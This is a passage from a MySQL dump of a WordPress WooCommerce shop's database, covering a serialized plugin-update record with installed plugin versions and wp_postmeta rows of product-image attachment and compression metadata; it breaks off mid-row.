razorpay-payment-button/assets/banner-772x250.png?rev=2594699\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";b:0;}s:62:\"razorpay-payment-button-elementor/razorpay-payment-buttons.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:47:\"w.org/plugins/razorpay-payment-button-elementor\";s:4:\"slug\";s:33:\"razorpay-payment-button-elementor\";s:6:\"plugin\";s:62:\"razorpay-payment-button-elementor/razorpay-payment-buttons.php\";s:11:\"new_version\";s:5:\"1.2.8\";s:3:\"url\";s:64:\"https://wordpress.org/plugins/razorpay-payment-button-elementor/\";s:7:\"package\";s:82:\"https://downloads.wordpress.org/plugin/razorpay-payment-button-elementor.1.2.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/razorpay-payment-button-elementor/assets/icon-256x256.png?rev=2612452\";s:2:\"1x\";s:86:\"https://ps.w.org/razorpay-payment-button-elementor/assets/icon-256x256.png?rev=2612452\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:89:\"https://ps.w.org/razorpay-payment-button-elementor/assets/banner-1544x500.png?rev=2612452\";s:2:\"1x\";s:88:\"https://ps.w.org/razorpay-payment-button-elementor/assets/banner-772x250.png?rev=2612452\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";b:0;}s:45:\"restrict-user-access/restrict-user-access.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/restrict-user-access\";s:4:\"slug\";s:20:\"restrict-user-access\";s:6:\"plugin\";s:45:\"restrict-user-access/restrict-user-access.php\";s:11:\"new_version\";s:3:\"2.8\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/restrict-user-access/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/restrict-user-access.2.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/restrict-user-access/assets/icon-256x256.png?rev=1815922\";s:2:\"1x\";s:73:\"https://ps.w.org/restrict-user-access/assets/icon-128x128.png?rev=1815922\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/restrict-user-access/assets/banner-1544x500.png?rev=1815922\";s:2:\"1x\";s:75:\"https://ps.w.org/restrict-user-access/assets/banner-772x250.png?rev=1815922\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:28:\"totalcontest-lite/plugin.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/totalcontest-lite\";s:4:\"slug\";s:17:\"totalcontest-lite\";s:6:\"plugin\";s:28:\"totalcontest-lite/plugin.php\";s:11:\"new_version\";s:5:\"2.9.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/totalcontest-lite/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/totalcontest-lite.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/totalcontest-lite/assets/icon-256x256.png?rev=2945575\";s:2:\"1x\";s:70:\"https://ps.w.org/totalcontest-lite/assets/icon-128x128.png?rev=2945575\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/totalcontest-lite/assets/banner-1544x500.png?rev=2945575\";s:2:\"1x\";s:72:\"https://ps.w.org/totalcontest-lite/assets/banner-772x250.png?rev=2945575\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.8\";}s:35:\"wc-cancel-order/wc-cancel-order.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/wc-cancel-order\";s:4:\"slug\";s:15:\"wc-cancel-order\";s:6:\"plugin\";s:35:\"wc-cancel-order/wc-cancel-order.php\";s:11:\"new_version\";s:5:\"3.5.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wc-cancel-order/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/wc-cancel-order.3.5.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wc-cancel-order/assets/icon-256x256.png?rev=2763289\";s:2:\"1x\";s:68:\"https://ps.w.org/wc-cancel-order/assets/icon-128x128.png?rev=2763289\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/wc-cancel-order/assets/banner-1544x500.png?rev=2763301\";s:2:\"1x\";s:70:\"https://ps.w.org/wc-cancel-order/assets/banner-772x250.png?rev=2763301\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.7\";}}s:7:\"checked\";a:56:{s:29:\"woo-razorpay/woo-razorpay.php\";s:5:\"4.8.0\";s:21:\"abyposyp/abyposyp.php\";s:6:\"3.12.6\";s:21:\"aduxukag/aduxukag.php\";s:5:\"1.9.6\";s:55:\"th-advance-product-search/th-advance-product-search.php\";s:5:\"1.3.1\";s:19:\"akismet/akismet.php\";s:3:\"5.6\";s:25:\"akygumohyz/akygumohyz.php\";s:5:\"2.9.5\";s:49:\"th-all-in-one-woo-cart/th-all-in-one-woo-cart.php\";s:5:\"2.2.4\";s:43:\"armember-membership/armember-membership.php\";s:6:\"4.0.59\";s:24:\"buddypress/bp-loader.php\";s:6:\"14.4.0\";s:50:\"woocommerce-bulk-order-form/wc-bulk-order-form.php\";s:5:\"3.7.2\";s:43:\"woo-cart-all-in-one/woo-cart-all-in-one.php\";s:6:\"1.1.21\";s:25:\"charitable/charitable.php\";s:7:\"1.8.9.2\";s:48:\"chikkili-google-pay-for-woocommerce/chikkili.php\";s:5:\"1.0.6\";s:31:\"code-snippets/code-snippets.php\";s:5:\"3.9.4\";s:83:\"custom-shipping-methods-for-woocommerce/custom-shipping-methods-for-woocommerce.php\";s:5:\"1.9.1\";s:45:\"wc-donation-platform/wc-donation-platform.php\";s:7:\"1.3.4.1\";s:46:\"themehunk-megamenu-plus/themehunk-megamenu.php\";s:5:\"1.1.2\";s:23:\"elementor/elementor.php\";s:6:\"3.35.0\";s:69:\"estimated-delivery-for-woocommerce/estimated-delivery-woocommerce.php\";s:5:\"1.4.5\";s:39:\"file-upload-types/file-upload-types.php\";s:5:\"1.5.0\";s:51:\"flexible-product-fields/flexible-product-fields.php\";s:6:\"2.12.2\";s:25:\"forminator/forminator.php\";s:6:\"1.50.1\";s:25:\"gtranslate/gtranslate.php\";s:5:\"3.0.9\";s:9:\"hello.php\";s:5:\"1.7.2\";s:33:\"hunk-companion/hunk-companion.php\";s:3:\"2.0\";s:40:\"wp-file-upload/wordpress_file_upload.php\";s:5:\"5.1.7\";s:39:\"job-board-manager/job-board-manager.php\";s:6:\"2.1.61\";s:25:\"jobboardwp/jobboardwp.php\";s:5:\"1.3.3\";s:42:\"landingi-landing-pages/landingi-plugin.php\";s:5:\"4.2.0\";s:86:\"login-with-mobile-number-for-woocommerce/login-with-mobile-number-for-wooocommerce.php\";s:5:\"1.0.8\";s:25:\"menu-icons/menu-icons.php\";s:7:\"0.13.21\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:5:\"3.4.0\";s:80:\"woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php\";s:5:\"5.6.0\";s:57:\"perfect-woocommerce-brands/perfect-woocommerce-brands.php\";s:5:\"3.6.8\";s:52:\"razorpay-payment-button/razorpay-payment-buttons.php\";s:5:\"2.4.9\";s:62:\"razorpay-payment-button-elementor/razorpay-payment-buttons.php\";s:5:\"1.2.8\";s:45:\"restrict-user-access/restrict-user-access.php\";s:3:\"2.8\";s:29:\"shared-files/shared-files.php\";s:6:\"1.7.58\";s:42:\"simple-membership/simple-wp-membership.php\";s:5:\"4.7.0\";s:21:\"bp-gifts/bp-gifts.php\";s:5:\"1.0.0\";s:25:\"tablepress/tablepress.php\";s:5:\"3.2.6\";s:28:\"totalcontest-lite/plugin.php\";s:5:\"2.9.1\";s:54:\"wapppress-builds-android-app-for-website/wappPress.php\";s:5:\"7.0.5\";s:35:\"wc-cancel-order/wc-cancel-order.php\";s:5:\"3.5.1\";s:43:\"wc-frontend-manager/wc_frontend_manager.php\";s:6:\"6.7.24\";s:57:\"wc-multivendor-marketplace/wc-multivendor-marketplace.php\";s:5:\"3.7.0\";s:55:\"wc-multivendor-membership/wc-multivendor-membership.php\";s:6:\"2.11.8\";s:27:\"woocommerce/woocommerce.php\";s:6:\"10.4.3\";s:49:\"wp-file-download-light/wp-file-download-light.php\";s:5:\"1.3.3\";s:39:\"wp-file-manager/file_folder_manager.php\";s:5:\"8.0.2\";s:24:\"wpforms-lite/wpforms.php\";s:7:\"1.9.9.2\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:5:\"4.7.1\";s:49:\"wp-table-manager-light/wp-table-manager-light.php\";s:5:\"1.3.3\";s:39:\"yith-pre-order-for-woocommerce/init.php\";s:6:\"3.13.0\";s:25:\"zlrsurmzet/zlrsurmzet.php\";s:6:\"2.12.1\";s:22:\"zoho-mail/zohoMail.php\";s:5:\"1.6.2\";}}','off'),(860995,'_transient_timeout_charitable_square_cleanup_last_run','1781639648','off'),(860996,'_transient_charitable_square_cleanup_last_run','1781553248','off');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=12463 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (2,3,'_wp_page_template','default'),(3,7,'_wp_attached_file','woocommerce-placeholder.png'),(4,7,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"woocommerce-placeholder-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11549;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2039;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"woocommerce-placeholder-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:816;}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5,13,'_wp_attached_file','2022/01/log_file_2022-01-24__07-48-38.txt'),(6,14,'_wp_attached_file','2020/06/woocommerce-placeholder.png'),(7,14,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2020/06/woocommerce-placeholder.png\";s:8:\"filesize\";i:48149;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"woocommerce-placeholder-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11449;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2028;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"woocommerce-placeholder-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:812;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8,14,'tiny_compress_images','a:11:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:102644;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:48149;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:5:\"ratio\";d:0.46910000000000002;}s:3:\"end\";i:1594122837;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:10596;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4414;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.41660000000000003;}s:3:\"end\";i:1594122841;}s:5:\"large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:79224;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:30336;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:5:\"ratio\";d:0.38290000000000002;}s:3:\"end\";i:1594122846;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3568;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1484;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.41589999999999999;}s:3:\"end\";i:1594122839;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:49112;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20590;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:5:\"ratio\";d:0.41920000000000002;}s:3:\"end\";i:1594122843;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:11740;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4838;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.41210000000000002;}s:3:\"end\";i:1594122849;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:33490;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13615;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.40649999999999997;}s:3:\"end\";i:1594122852;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1716;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:831;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.48430000000000001;}s:3:\"end\";i:1594122855;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}}'),(9,14,'siteground_optimizer_optimization_attempts','1'),(10,14,'siteground_optimizer_is_optimized','1'),(11,14,'siteground_optimizer_webp_conversion_attempts','1'),(12,14,'siteground_optimizer_webp_conversion_failed','1'),(13,105,'_wp_attached_file','2020/06/download-app-footer-image.png'),(14,105,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:478;s:6:\"height\";i:83;s:4:\"file\";s:37:\"2020/06/download-app-footer-image.png\";s:8:\"filesize\";i:5962;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:36:\"download-app-footer-image-320x83.png\";s:5:\"width\";i:320;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9303;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:36:\"download-app-footer-image-100x83.png\";s:5:\"width\";i:100;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2242;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:34:\"download-app-footer-image-50x9.png\";s:5:\"width\";i:50;s:6:\"height\";i:9;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1109;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(15,105,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6730;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5962;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:478;s:6:\"height\";i:83;s:5:\"ratio\";d:0.88590000000000002;}s:3:\"end\";i:1594122835;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8560;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4548;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:5:\"ratio\";d:0.53129999999999999;}s:3:\"end\";i:1594122840;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1953;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1536;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:83;s:5:\"ratio\";d:0.78649999999999998;}s:3:\"end\";i:1594122837;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4657;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3838;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:83;s:5:\"ratio\";d:0.82410000000000005;}s:3:\"end\";i:1594122842;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1443;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1066;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:83;s:5:\"ratio\";d:0.73870000000000002;}s:3:\"end\";i:1594122845;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"error\";s:22:\"TinifyAccountException\";s:7:\"message\";s:64:\"Your monthly limit has been exceeded. (HTTP 429/TooManyRequests)\";s:9:\"timestamp\";i:1591599410;}}'),(16,105,'siteground_optimizer_optimization_attempts','1'),(17,105,'siteground_optimizer_is_optimized','1'),(18,105,'siteground_optimizer_webp_conversion_attempts','1'),(19,105,'siteground_optimizer_webp_conversion_failed','1'),(20,148,'_wp_attached_file','2020/06/organic-cucumber.png'),(21,148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:220;s:6:\"height\";i:145;s:4:\"file\";s:28:\"2020/06/organic-cucumber.png\";s:8:\"filesize\";i:13434;s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"organic-cucumber-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16111;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"organic-cucumber-50x33.png\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2724;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22,148,'tiny_compress_images','a:4:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:43627;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13434;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:145;s:5:\"ratio\";d:0.30790000000000001;}s:3:\"end\";i:1591599395;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12083;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11894;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:145;s:5:\"ratio\";d:0.98440000000000005;}s:3:\"end\";i:1594122829;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:16432;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6434;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.3916;}s:3:\"end\";i:1594122832;}s:14:\"shop_thumbnail\";a:0:{}}'),(23,148,'siteground_optimizer_optimization_attempts','1'),(24,148,'siteground_optimizer_is_optimized','1'),(25,148,'siteground_optimizer_webp_conversion_attempts','1'),(26,148,'siteground_optimizer_webp_conversion_failed','1'),(27,171,'_wp_attached_file','2020/06/organicc-apples.png'),(28,171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2020/06/organicc-apples.png\";s:8:\"filesize\";i:48641;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"organicc-apples-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68546;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"organicc-apples-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9402;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"organicc-apples-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3086;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29,171,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:219853;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:48641;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.22120000000000001;}s:3:\"end\";i:1591599395;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:58945;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:16967;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.2878;}s:3:\"end\";i:1594122826;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18297;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6375;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.34839999999999999;}s:3:\"end\";i:1594122823;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:67925;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:18227;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.26829999999999998;}s:3:\"end\";i:1594122830;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9142;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3793;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.41489999999999999;}s:3:\"end\";i:1594122833;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:35630;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10317;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.28960000000000002;}s:3:\"end\";i:1591599405;}}'),(30,171,'siteground_optimizer_optimization_attempts','1'),(31,171,'siteground_optimizer_is_optimized','1'),(32,171,'siteground_optimizer_webp_conversion_attempts','1'),(33,171,'siteground_optimizer_webp_conversion_failed','1'),(35,173,'_wp_attached_file','2020/06/organicc-banana.png'),(36,173,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2020/06/organicc-banana.png\";s:8:\"filesize\";i:33236;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"organicc-banana-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44001;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"organicc-banana-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6356;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"organicc-banana-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2228;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37,173,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:135566;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:33236;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i